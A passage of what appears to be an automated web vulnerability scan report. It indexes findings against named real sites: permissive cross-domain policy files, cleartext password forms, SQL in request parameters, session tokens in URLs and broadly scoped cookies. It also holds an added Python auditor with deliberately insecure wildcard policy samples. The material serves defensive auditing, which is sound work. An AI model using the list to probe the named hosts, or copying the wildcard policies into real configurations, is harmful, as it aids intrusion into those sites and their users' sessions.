4.3. http://a1.interclick.com/crossdomain.xml

4.4. http://a1.sndcdn.com/crossdomain.xml

4.5. http://action.mathtag.com/crossdomain.xml

4.6. http://ad.doubleclick.net/crossdomain.xml

4.7. http://admeld.adnxs.com/crossdomain.xml

4.8. http://ads.pointroll.com/crossdomain.xml

4.9. http://ads.undertone.com/crossdomain.xml

4.10. http://adserver.adtechus.com/crossdomain.xml

4.11. http://adsfac.us/crossdomain.xml

4.12. http://altfarm.mediaplex.com/crossdomain.xml

4.13. http://amch.questionmarket.com/crossdomain.xml

4.14. http://ar.voicefive.com/crossdomain.xml

4.15. http://audit.303br.net/crossdomain.xml

4.16. http://b.scorecardresearch.com/crossdomain.xml

4.17. http://b.voicefive.com/crossdomain.xml

4.18. http://b3.mookie1.com/crossdomain.xml

4.19. http://bs.serving-sys.com/crossdomain.xml

4.20. http://c.betrad.com/crossdomain.xml

4.21. http://c7.zedo.com/crossdomain.xml

4.22. http://cache.specificmedia.com/crossdomain.xml

4.23. http://cas.criteo.com/crossdomain.xml

4.24. http://cctrkom.creditcards.com/crossdomain.xml

4.25. http://cdn.interclick.com/crossdomain.xml

4.26. http://cdn.turn.com/crossdomain.xml

4.27. http://cdn5.tribalfusion.com/crossdomain.xml

4.28. http://core.insightexpressai.com/crossdomain.xml

4.29. http://cts-log.channelintelligence.com/crossdomain.xml

4.30. http://d7.zedo.com/crossdomain.xml

4.31. http://dar.youknowbest.com/crossdomain.xml

4.32. http://dis.ny.us.criteo.com/crossdomain.xml

4.33. http://ds.serving-sys.com/crossdomain.xml

4.34. http://ebay.adnxs.com/crossdomain.xml

4.35. http://external.ak.fbcdn.net/crossdomain.xml

4.36. http://fls.doubleclick.net/crossdomain.xml

4.37. http://fw.adsafeprotected.com/crossdomain.xml

4.38. http://homedepot.ugc.bazaarvoice.com/crossdomain.xml

4.39. http://i1.sndcdn.com/crossdomain.xml

4.40. http://ib.adnxs.com/crossdomain.xml

4.41. http://ic.nexac.com/crossdomain.xml

4.42. http://idcs.interclick.com/crossdomain.xml

4.43. http://img.mediaplex.com/crossdomain.xml

4.44. http://impl.ackak.com/crossdomain.xml

4.45. http://js.revsci.net/crossdomain.xml

4.46. http://l2.betrad.com/crossdomain.xml

4.47. http://log30.doubleverify.com/crossdomain.xml

4.48. http://media2.legacy.com/crossdomain.xml

4.49. http://metrics.citibank.com/crossdomain.xml

4.50. http://oimg.nbcuni.com/crossdomain.xml

4.51. http://om.dowjoneson.com/crossdomain.xml

4.52. http://p.addthis.com/crossdomain.xml

4.53. http://pbid.pro-market.net/crossdomain.xml

4.54. http://pix04.revsci.net/crossdomain.xml

4.55. http://pixel.adsafeprotected.com/crossdomain.xml

4.56. http://pixel.everesttech.net/crossdomain.xml

4.57. http://pixel.invitemedia.com/crossdomain.xml

4.58. http://pixel.quantserve.com/crossdomain.xml

4.59. http://puma.vizu.com/crossdomain.xml

4.60. http://r.turn.com/crossdomain.xml

4.61. http://radiumone.com/crossdomain.xml

4.62. http://reviews.homedepot.com/crossdomain.xml

4.63. http://rmd.atdmt.com/crossdomain.xml

4.64. http://rp.gwallet.com/crossdomain.xml

4.65. http://rs.gwallet.com/crossdomain.xml

4.66. http://secure-us.imrworldwide.com/crossdomain.xml

4.67. http://segment-pixel.invitemedia.com/crossdomain.xml

4.68. http://spe.atdmt.com/crossdomain.xml

4.69. http://sync.mathtag.com/crossdomain.xml

4.70. http://t.mookie1.com/crossdomain.xml

4.71. http://tags.bluekai.com/crossdomain.xml

4.72. http://tf.nexac.com/crossdomain.xml

4.73. http://ttwbs.channelintelligence.com/crossdomain.xml

4.74. http://va.px.invitemedia.com/crossdomain.xml

4.75. http://wasc.homedepot.com/crossdomain.xml

4.76. http://www.creditcards.com/crossdomain.xml

4.77. http://www.wunderground.com/crossdomain.xml

4.78. http://www2.sesamestats.com/crossdomain.xml

4.79. http://adadvisor.net/crossdomain.xml

4.80. http://ads.bridgetrack.com/crossdomain.xml

4.81. http://ads.cleveland.com/crossdomain.xml

4.82. http://ads.nj.com/crossdomain.xml

4.83. http://ads.oregonlive.com/crossdomain.xml

4.84. http://ads1.msn.com/crossdomain.xml

4.85. http://adx.g.doubleclick.net/crossdomain.xml

4.86. http://check4.facebook.com/crossdomain.xml

4.87. http://check6.facebook.com/crossdomain.xml

4.88. http://edge.sharethis.com/crossdomain.xml

4.89. http://feeds.bbci.co.uk/crossdomain.xml

4.90. http://googleads.g.doubleclick.net/crossdomain.xml

4.91. http://login.dotomi.com/crossdomain.xml

4.92. http://media.cnbc.com/crossdomain.xml

4.93. http://newsrss.bbc.co.uk/crossdomain.xml

4.94. http://oc.creditcards.com/crossdomain.xml

4.95. http://online.wsj.com/crossdomain.xml

4.96. http://optimized-by.rubiconproject.com/crossdomain.xml

4.97. http://p.opt.fimserve.com/crossdomain.xml

4.98. http://pagead2.googlesyndication.com/crossdomain.xml

4.99. http://quote.cnbc.com/crossdomain.xml

4.100. http://rd.rlcdn.com/crossdomain.xml

4.101. http://rover.ebay.com/crossdomain.xml

4.102. http://search.cnbc.com/crossdomain.xml

4.103. http://soundcloud.com/crossdomain.xml

4.104. https://soundcloud.com/crossdomain.xml

4.105. http://static.ak.fbcdn.net/crossdomain.xml

4.106. http://w.sharethis.com/crossdomain.xml

4.107. http://www.cnbc.com/crossdomain.xml

4.108. http://www.facebook.com/crossdomain.xml

4.109. http://www.homedepot.com/crossdomain.xml

4.110. http://www.res-x.com/crossdomain.xml

4.111. http://www.wtp101.com/crossdomain.xml

4.112. http://citi.bridgetrack.com/crossdomain.xml

4.113. http://creditcards.citicards.com/crossdomain.xml

4.114. http://ilslaunch.app2.hubspot.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

5.3. http://ads1.msn.com/clientaccesspolicy.xml

5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.5. http://b.voicefive.com/clientaccesspolicy.xml

5.6. http://cctrkom.creditcards.com/clientaccesspolicy.xml

5.7. http://metrics.citibank.com/clientaccesspolicy.xml

5.8. http://oimg.nbcuni.com/clientaccesspolicy.xml

5.9. http://om.dowjoneson.com/clientaccesspolicy.xml

5.10. http://rmd.atdmt.com/clientaccesspolicy.xml

5.11. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.12. http://spe.atdmt.com/clientaccesspolicy.xml

5.13. http://wasc.homedepot.com/clientaccesspolicy.xml

5.14. http://media.cnbc.com/clientaccesspolicy.xml

5.15. http://www.cnbc.com/clientaccesspolicy.xml
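
The Flash (crossdomain.xml, section 4) and Silverlight (clientaccesspolicy.xml, section 5) entries above only record that a policy file was served at each URL. Whether that matters depends on the file's content: a policy that grants access to a single named domain is harmless, while one that grants `domain="*"`, sets `secure="false"`, honours policies from anywhere on the host, or lets any origin send arbitrary request headers lets a plug-in on an attacker's page make credentialed requests to the host and read the responses. The checker below is an added example written for this page, not code from the XSS.CX report or from any of the listed sites; the three sample policy documents are constructed for illustration and do not reproduce what any listed host actually serves.

```python
"""Audit Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml)
cross-domain policies for overly permissive grants.

Added checker, not part of the scan report. The sample policies below are
constructed; fetch the real file with your HTTP client of choice and pass
its text to audit_crossdomain() or audit_clientaccesspolicy()."""
import xml.etree.ElementTree as ET

# Constructed sample: wildcard Flash policy, the worst case.
FLASH_WILDCARD = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Constructed sample: tightly scoped Flash policy, nothing to report.
FLASH_STRICT = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com"/>
</cross-domain-policy>"""

# Constructed sample: wildcard Silverlight policy.
SL_WILDCARD = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""


def _wild(domain: str) -> bool:
    """True for '*' or a leading-wildcard pattern such as '*.example.com'.
    A leading wildcard covers every subdomain, including any an attacker
    can register or compromise under that suffix."""
    d = domain.strip()
    return d == "*" or d.startswith("*.")


def audit_crossdomain(xml_text: str) -> list[str]:
    """Return a list of findings for a Flash crossdomain.xml document."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter("allow-access-from"):
        dom = el.get("domain", "")
        if _wild(dom):
            findings.append(f"allow-access-from domain={dom!r}")
        # secure="false" lets a SWF loaded over http:// read https://
        # responses from this host, voiding TLS for that data.
        if el.get("secure", "true").lower() == "false":
            findings.append(f"allow-access-from domain={dom!r} secure=false")
    for el in root.iter("allow-http-request-headers-from"):
        if _wild(el.get("domain", "")):
            findings.append("allow-http-request-headers-from domain wildcard")
    sc = root.find("site-control")
    if sc is not None and sc.get("permitted-cross-domain-policies") == "all":
        # "all" honours policy files served from any path on the host,
        # e.g. an uploaded file, not only the master /crossdomain.xml.
        findings.append("site-control permitted-cross-domain-policies=all")
    return findings


def audit_clientaccesspolicy(xml_text: str) -> list[str]:
    """Return a list of findings for a Silverlight clientaccesspolicy.xml."""
    findings = []
    root = ET.fromstring(xml_text)
    for policy in root.iter("policy"):
        for af in policy.iter("allow-from"):
            if af.get("http-request-headers", "") == "*":
                findings.append("allow-from http-request-headers=*")
            for d in af.iter("domain"):
                if _wild(d.get("uri", "")):
                    findings.append(f"allow-from domain uri={d.get('uri')!r}")
        for res in policy.iter("resource"):
            subpaths = res.get("include-subpaths", "false").lower() == "true"
            if res.get("path") == "/" and subpaths:
                findings.append("grant-to resource path=/ include-subpaths=true")
    return findings


if __name__ == "__main__":
    cases = [("flash-wildcard", FLASH_WILDCARD, audit_crossdomain),
             ("flash-strict", FLASH_STRICT, audit_crossdomain),
             ("silverlight-wildcard", SL_WILDCARD, audit_clientaccesspolicy)]
    for name, text, fn in cases:
        print(name, fn(text) or "no findings")
```

A wildcard policy on a pure ad-beacon host that holds no user data is a lower-severity finding than the same policy on a host that sets session cookies; triage each entry above by what the host serves to an authenticated user, not by the presence of the file alone.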

6. Cleartext submission of password

6.1. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html

6.2. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html

6.3. http://online.wsj.com/home-page

7. SQL statement in request parameter

7.1. https://soundcloud.com/login

7.2. http://www.creditcards.com/oc/

7.3. http://www.nutter.com/attorneys.php

8. SSL cookie without secure flag set

9. Session token in URL

9.1. http://l.sharethis.com/pview

9.2. http://www.facebook.com/extern/login_status.php

9.3. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay

10. Cookie scoped to parent domain

10.1. http://cts-log.channelintelligence.com/

10.2. http://login.dotomi.com/ucm/UCMController

10.3. http://pixel.everesttech.net/1688/i

10.4. http://t.mookie1.com/t/v1/imp

10.5. http://ttwbs.channelintelligence.com/

10.6. http://www.creditcards.com/xtrack.php

10.7. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

10.8. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

10.9. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

10.10. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay

10.11. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation

10.12. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate

10.13. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService

10.14. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay

10.15. http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService

10.16. http://www.ilslaunch.com/skyterra-1-mission-control

10.17. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

10.18. http://a.amxdt.com/px/

10.19. http://a.rfihub.com/cm

10.20. http://a.rfihub.com/cm

10.21. http://a.rfihub.com/sed

10.22. http://a.rfihub.com/tk.gif

10.23. http://a.tribalfusion.com/i.match

10.24. http://a.tribalfusion.com/j.ad

10.25. http://a1.interclick.com/ColDta.aspx

10.26. http://a1.interclick.com/Segment.aspx

10.27. http://admeld.adnxs.com/usersync

10.28. http://ads.revsci.net/adserver/ako

10.29. http://ads.revsci.net/adserver/ako

10.30. http://ads.revsci.net/adserver/ako

10.31. http://ads.undertone.com/ajs.php

10.32. http://ak1.abmr.net/is/ads.undertone.com

10.33. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

10.34. http://ak1.abmr.net/is/tag.admeld.com

10.35. http://ak1.abmr.net/is/www.homedepot.com

10.36. http://amch.questionmarket.com/adsc/d844890/33/39959888/decide.php

10.37. http://amch.questionmarket.com/adsc/d844890/33/39959895/decide.php

10.38. http://amch.questionmarket.com/adsc/d844890/33/39959897/decide.php

10.39. http://api.bizographics.com/v1/profile.json

10.40. http://api.bizographics.com/v1/profile.redirect

10.41. http://ar.voicefive.com/b/wc_beacon.pli

10.42. http://ar.voicefive.com/bmx3/broker.pli

10.43. http://ar.voicefive.com/bmx3/broker.pli

10.44. http://ar.voicefive.com/bmx3/broker.pli

10.45. http://b.scorecardresearch.com/b

10.46. http://b.scorecardresearch.com/r

10.47. http://b.voicefive.com/b

10.48. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.49. http://c7.zedo.com/img/bh.gif

10.50. http://cas.criteo.com/delivery/afr.php

10.51. http://click.linksynergy.com/fs-bin/click

10.52. http://d7.zedo.com/img/bh.gif

10.53. http://dis.ny.us.criteo.com/dis/dis.aspx

10.54. http://ebay.adnxs.com/ttj

10.55. http://ib.adnxs.com/getuid

10.56. http://ib.adnxs.com/getuidu

10.57. http://ib.adnxs.com/mapuid

10.58. http://ib.adnxs.com/ptj

10.59. http://ib.adnxs.com/pxj

10.60. http://ib.adnxs.com/seg

10.61. http://ib.adnxs.com/setuid

10.62. http://idcs.interclick.com/Segment.aspx

10.63. http://image2.pubmatic.com/AdServer/Pug

10.64. http://imp.constantcontact.com/imp/cmp.jsp

10.65. http://js.revsci.net/common/pcx.js

10.66. http://js.revsci.net/gateway/gw.js

10.67. http://leadback.advertising.com/adcedge/lb

10.68. http://map.media6degrees.com/orbserv/hbpix

10.69. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15

10.70. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15

10.71. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15

10.72. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15

10.73. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15

10.74. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15

10.75. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15

10.76. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15

10.77. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15

10.78. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15

10.79. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15

10.80. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15

10.81. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15

10.82. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15

10.83. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15

10.84. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15

10.85. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15

10.86. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15

10.87. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15

10.88. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15

10.89. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1

10.90. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1

10.91. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1

10.92. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1

10.93. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1

10.94. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1

10.95. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1

10.96. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1

10.97. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1

10.98. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1

10.99. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1

10.100. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1

10.101. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1

10.102. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1

10.103. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1

10.104. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1

10.105. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1

10.106. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1

10.107. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

10.108. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

10.109. http://optimized-by.rubiconproject.com/a/dk.html

10.110. http://optimized-by.rubiconproject.com/a/dk.html

10.111. http://optimized-by.rubiconproject.com/a/dk.js

10.112. http://optimized-by.rubiconproject.com/a/dk.js

10.113. http://p.opt.fimserve.com/bht/

10.114. http://pbid.pro-market.net/engine

10.115. http://phoenix.untd.com/TRCK/RGST

10.116. http://pix04.revsci.net/D10889/a1/0/3/0.gif

10.117. http://pix04.revsci.net/D10889/a1/0/3/0.gif

10.118. http://pix04.revsci.net/D10889/a1/0/3/0.gif

10.119. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif

10.120. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

10.121. http://pix04.revsci.net/I10985/b3/0/3/1008211/111571878.js

10.122. http://pix04.revsci.net/I10985/b3/0/3/1008211/118546994.js

10.123. http://pix04.revsci.net/I10985/b3/0/3/1008211/128597095.js

10.124. http://pix04.revsci.net/I10985/b3/0/3/1008211/149141737.js

10.125. http://pix04.revsci.net/I10985/b3/0/3/1008211/152539728.js

10.126. http://pix04.revsci.net/I10985/b3/0/3/1008211/153416135.js

10.127. http://pix04.revsci.net/I10985/b3/0/3/1008211/167338616.js

10.128. http://pix04.revsci.net/I10985/b3/0/3/1008211/174739392.js

10.129. http://pix04.revsci.net/I10985/b3/0/3/1008211/178674175.js

10.130. http://pix04.revsci.net/I10985/b3/0/3/1008211/204994515.js

10.131. http://pix04.revsci.net/I10985/b3/0/3/1008211/20510025.js

10.132. http://pix04.revsci.net/I10985/b3/0/3/1008211/206078584.js

10.133. http://pix04.revsci.net/I10985/b3/0/3/1008211/209054641.js

10.134. http://pix04.revsci.net/I10985/b3/0/3/1008211/210088310.js

10.135. http://pix04.revsci.net/I10985/b3/0/3/1008211/235290478.js

10.136. http://pix04.revsci.net/I10985/b3/0/3/1008211/242178359.js

10.137. http://pix04.revsci.net/I10985/b3/0/3/1008211/252539645.js

10.138. http://pix04.revsci.net/I10985/b3/0/3/1008211/266352153.js

10.139. http://pix04.revsci.net/I10985/b3/0/3/1008211/266715150.js

10.140. http://pix04.revsci.net/I10985/b3/0/3/1008211/266829410.js

10.141. http://pix04.revsci.net/I10985/b3/0/3/1008211/271822828.js

10.142. http://pix04.revsci.net/I10985/b3/0/3/1008211/298241288.js

10.143. http://pix04.revsci.net/I10985/b3/0/3/1008211/306033605.js

10.144. http://pix04.revsci.net/I10985/b3/0/3/1008211/31221949.js

10.145. http://pix04.revsci.net/I10985/b3/0/3/1008211/319879025.js

10.146. http://pix04.revsci.net/I10985/b3/0/3/1008211/321200067.js

10.147. http://pix04.revsci.net/I10985/b3/0/3/1008211/325815715.js

10.148. http://pix04.revsci.net/I10985/b3/0/3/1008211/329181290.js

10.149. http://pix04.revsci.net/I10985/b3/0/3/1008211/351391247.js

10.150. http://pix04.revsci.net/I10985/b3/0/3/1008211/35234473.js

10.151. http://pix04.revsci.net/I10985/b3/0/3/1008211/352735390.js

10.152. http://pix04.revsci.net/I10985/b3/0/3/1008211/400010602.js

10.153. http://pix04.revsci.net/I10985/b3/0/3/1008211/4030732.js

10.154. http://pix04.revsci.net/I10985/b3/0/3/1008211/411814556.js

10.155. http://pix04.revsci.net/I10985/b3/0/3/1008211/434601309.js

10.156. http://pix04.revsci.net/I10985/b3/0/3/1008211/448263760.js

10.157. http://pix04.revsci.net/I10985/b3/0/3/1008211/450083429.js

10.158. http://pix04.revsci.net/I10985/b3/0/3/1008211/469061960.js

10.159. http://pix04.revsci.net/I10985/b3/0/3/1008211/47135208.js

10.160. http://pix04.revsci.net/I10985/b3/0/3/1008211/474207582.js

10.161. http://pix04.revsci.net/I10985/b3/0/3/1008211/48193081.js

10.162. http://pix04.revsci.net/I10985/b3/0/3/1008211/482745036.js

10.163. http://pix04.revsci.net/I10985/b3/0/3/1008211/518130278.js

10.164. http://pix04.revsci.net/I10985/b3/0/3/1008211/541993060.js

10.165. http://pix04.revsci.net/I10985/b3/0/3/1008211/572738137.js

10.166. http://pix04.revsci.net/I10985/b3/0/3/1008211/579855884.js

10.167. http://pix04.revsci.net/I10985/b3/0/3/1008211/602675862.js

10.168. http://pix04.revsci.net/I10985/b3/0/3/1008211/603496051.js

10.169. http://pix04.revsci.net/I10985/b3/0/3/1008211/609031637.js

10.170. http://pix04.revsci.net/I10985/b3/0/3/1008211/609523113.js

10.171. http://pix04.revsci.net/I10985/b3/0/3/1008211/61287048.js

10.172. http://pix04.revsci.net/I10985/b3/0/3/1008211/616476492.js

10.173. http://pix04.revsci.net/I10985/b3/0/3/1008211/623863779.js

10.174. http://pix04.revsci.net/I10985/b3/0/3/1008211/632139984.js

10.175. http://pix04.revsci.net/I10985/b3/0/3/1008211/656764106.js

10.176. http://pix04.revsci.net/I10985/b3/0/3/1008211/663059389.js

10.177. http://pix04.revsci.net/I10985/b3/0/3/1008211/677906397.js

10.178. http://pix04.revsci.net/I10985/b3/0/3/1008211/678221040.js

10.179. http://pix04.revsci.net/I10985/b3/0/3/1008211/697771504.js

10.180. http://pix04.revsci.net/I10985/b3/0/3/1008211/700812667.js

10.181. http://pix04.revsci.net/I10985/b3/0/3/1008211/7130573.js

10.182. http://pix04.revsci.net/I10985/b3/0/3/1008211/715243108.js

10.183. http://pix04.revsci.net/I10985/b3/0/3/1008211/719321222.js

10.184. http://pix04.revsci.net/I10985/b3/0/3/1008211/727551731.js

10.185. http://pix04.revsci.net/I10985/b3/0/3/1008211/743305953.js

10.186. http://pix04.revsci.net/I10985/b3/0/3/1008211/743306396.js

10.187. http://pix04.revsci.net/I10985/b3/0/3/1008211/747675233.js

10.188. http://pix04.revsci.net/I10985/b3/0/3/1008211/750853358.js

10.189. http://pix04.revsci.net/I10985/b3/0/3/1008211/759659174.js

10.190. http://pix04.revsci.net/I10985/b3/0/3/1008211/773834418.js

10.191. http://pix04.revsci.net/I10985/b3/0/3/1008211/778726069.js

10.192. http://pix04.revsci.net/I10985/b3/0/3/1008211/783069022.js

10.193. http://pix04.revsci.net/I10985/b3/0/3/1008211/791107298.js

10.194. http://pix04.revsci.net/I10985/b3/0/3/1008211/811937771.js

10.195. http://pix04.revsci.net/I10985/b3/0/3/1008211/812722846.js

10.196. http://pix04.revsci.net/I10985/b3/0/3/1008211/814191239.js

10.197. http://pix04.revsci.net/I10985/b3/0/3/1008211/821864121.js

10.198. http://pix04.revsci.net/I10985/b3/0/3/1008211/833474274.js

10.199. http://pix04.revsci.net/I10985/b3/0/3/1008211/837302366.js

10.200. http://pix04.revsci.net/I10985/b3/0/3/1008211/851863014.js

10.201. http://pix04.revsci.net/I10985/b3/0/3/1008211/85990292.js

10.202. http://pix04.revsci.net/I10985/b3/0/3/1008211/870883424.js

10.203. http://pix04.revsci.net/I10985/b3/0/3/1008211/8734315.js

10.204. http://pix04.revsci.net/I10985/b3/0/3/1008211/896562366.js

10.205. http://pix04.revsci.net/I10985/b3/0/3/1008211/91490024.js

10.206. http://pix04.revsci.net/I10985/b3/0/3/1008211/922092432.js

10.207. http://pix04.revsci.net/I10985/b3/0/3/1008211/927091024.js

10.208. http://pix04.revsci.net/I10985/b3/0/3/1008211/92794223.js

10.209. http://pix04.revsci.net/I10985/b3/0/3/1008211/944603151.js

10.210. http://pix04.revsci.net/I10985/b3/0/3/1008211/948985352.js

10.211. http://pix04.revsci.net/I10985/b3/0/3/1008211/959799423.js

10.212. http://pix04.revsci.net/I10985/b3/0/3/1008211/961894975.js

10.213. http://pix04.revsci.net/I10985/b3/0/3/1008211/97296821.js

10.214. http://pix04.revsci.net/I10985/b3/0/3/1008211/978202705.js

10.215. http://pixel.quantserve.com/pixel

10.216. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

10.217. http://pixel.quantserve.com/seg/p-9eJ8k4iSzux46.js

10.218. http://pixel.rubiconproject.com/di.php

10.219. http://pixel.rubiconproject.com/tap.php

10.220. http://pixel.rubiconproject.com/tap.php

10.221. http://pixel.rubiconproject.com/tap.php

10.222. http://r.turn.com/r/beacon

10.223. http://r.turn.com/server/pixel.htm

10.224. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=16893018/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.225. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=22319790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.226. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.227. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.228. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.229. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=61218373/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.230. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

